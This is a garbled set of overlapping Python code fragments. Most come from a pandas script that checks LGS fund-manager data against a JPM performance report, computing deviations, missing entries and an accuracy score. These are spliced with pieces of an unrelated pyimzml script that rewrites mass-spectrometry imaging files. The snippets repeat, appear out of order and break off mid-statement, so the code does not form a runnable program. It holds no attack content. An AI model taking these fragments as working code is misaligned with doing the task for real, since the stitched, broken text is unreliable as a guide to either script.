total_count += 1 # Fixes the", "dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap =", "# skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8]))", "6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet,", "if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed:", "NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet)", "# Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS", "= [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items():", "df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager',", "LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return':", "Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031", "'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations']", "footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan,", "as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary", "'12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' }", "in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( #", "df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm", "= set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity", "= df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market", "Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name':", "+ [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm,", "} ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0':", "JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month',", "dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table df_lgs =", "= [] deviations = [] jpm_missing = [] lgs_missing = [] total_count =", "ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix = []", "Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath", "= df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) #", "df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) #", "Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only", "total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i", "# # # Merges the market values from JPM IAP with JPM HTS", "2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during", "lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 #", "deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i]))", "'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'],", "lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total", "skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1':", "'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in", "# Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio", "IAP with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, #", "'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items():", "df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy =", "accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager']))", ") if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode',", "Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames", "- lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from LGS.", "jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11", "Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020,", "Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing", "np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers", "# Creates set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager']))", "'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet", "Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations = pd.DataFrame()", "len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation)", "currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set", ") df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column", "# df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market", "'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8':", "2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName',", "'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' }", "df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm", "during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ',", "{np.nan} # Prints open accounts that are missing from LGS. print('\\nMissing completely from", "'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that", "sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market", "ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True)", "0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i],", "Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing", "# left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' #", "columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm,", "} # Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns", "else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing =", "print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed", "are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts;", "Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames =", "# Creates set containing fund managers that are open accounts but are not", "as dt import numpy as np import pandas as pd # START USER", "and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess", "Merges the market values from JPM IAP with JPM HTS # df_jpm_main =", "results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing)", "df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that", "df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy", "Value']] # # # Merges the market values from JPM IAP with JPM", "[] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for", "(pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count +=", "total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers", "1 # Fixes the column names columns_fix = [] for column in columns:", "managers that are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set -", "LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance", "df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF':", "columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if", "Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) +", "Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel(", "Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks", "'Date', 'Market Value']] # # # Merges the market values from JPM IAP", "the column names columns_fix = [] for column in columns: if column ==", "pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0':", "Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants = []", "pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict", "are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'})", "in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if", "LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include", "'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm", "completely missed. # Creates set containing fund managers that are currently open accounts.", "HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager',", "deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count", "lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1", "= df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM", "columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants", "', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for", "for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns,", "with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm,", "header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap,", "ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed:", "[] lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn", "df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates", "= pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 )", "containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set", "'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7", "3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7", "accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM',", "accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import", "= pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm =", "column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager']", "the deviant check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations", "START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath", "pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing = []", "'Market Value']] # # # Merges the market values from JPM IAP with", "df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm", "'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm", "jpmcolumn)) total_count += 1 # Fixes the column names columns_fix = [] for", "'36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the", "set containing fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True)", "df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies.", "print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count:", "- df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if", "have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that", "the market values from JPM IAP with JPM HTS # df_jpm_main = pd\\", "lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation", "that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers", "'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy", "pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) #", "containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set", "df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2':", "total_count += 1 # Fixes the column names columns_fix = [] for column", "jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx,", "report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table", "to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1", "= df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] =", "if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM", "names columns_fix = [] for column in columns: if column == 'Market Value_y':", "int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account", "# Fixes the column names columns_fix = [] for column in columns: if", "removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return']", "jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i]", "df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = {", "', accuracy, '%') # Checks for managers that have been completely missed. #", "- lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that", "Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges", "Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap", "# sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]),", "and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count", "USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath =", "df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm =", "Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT", "= deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column'])", "# Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market", "df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 #", "return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer'", "df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads", "from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID;", "remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm =", "managers that have been completely missed. # Creates set containing fund managers that", "deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and", "= 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation", "lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in", "# # Merges the market values from JPM IAP with JPM HTS #", "open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set =", "from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select", "jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: #", "8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel(", "df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them", "sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx =", "# df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'],", "'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager', 'Date'])\\ # .reset_index(drop=True)", "lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from", "- {np.nan} # Prints open accounts that are missing from LGS. print('\\nMissing completely" ]
[ "import ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from", "ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file", "writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities =", "print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in", "as np import os from tqdm import tqdm ## SCRIPT 1B: Run this", "intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ ==", "= os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done", "this script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path", "= ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx,", "--\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading", "a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML", "with imzML and ibd files imzml_file = 'image_data_file.imzML' # Provide imzML data file", "encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing", "if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path,", "mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__", "in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords)", "def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n')", "as writer: for idx, coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities", "data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd", "ImzMLParser from pyimzml.ImzMLWriter import ImzMLWriter import numpy as np import os from tqdm", "import numpy as np import os from tqdm import tqdm ## SCRIPT 1B:", "Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords in enumerate(tqdm(p.coordinates,", "= 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and ibd files", "import tqdm ## SCRIPT 1B: Run this script if SCRIPT 1A encounters a", "import os from tqdm import tqdm ## SCRIPT 1B: Run this script if", "imzml_path = os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('--", "os.path.join(data_path, imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n')", "--\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer:", "imzml_file) print('-- Parsing imzML file --\\n') p = ImzMLParser(imzml_path) print('-- Done --\\n') with", "enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except", "coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' #", "'__main__': data_path = 'C:\\\\Path\\\\To\\\\IMS\\\\Data' # Provide path to data directory with imzML and", "script if SCRIPT 1A encounters a ValueError. def imzML_fix(data_path, imzml_file, polarity_str='positive'): imzml_path =", "file --\\n') p = ImzMLParser(imzml_path) print('-- Done 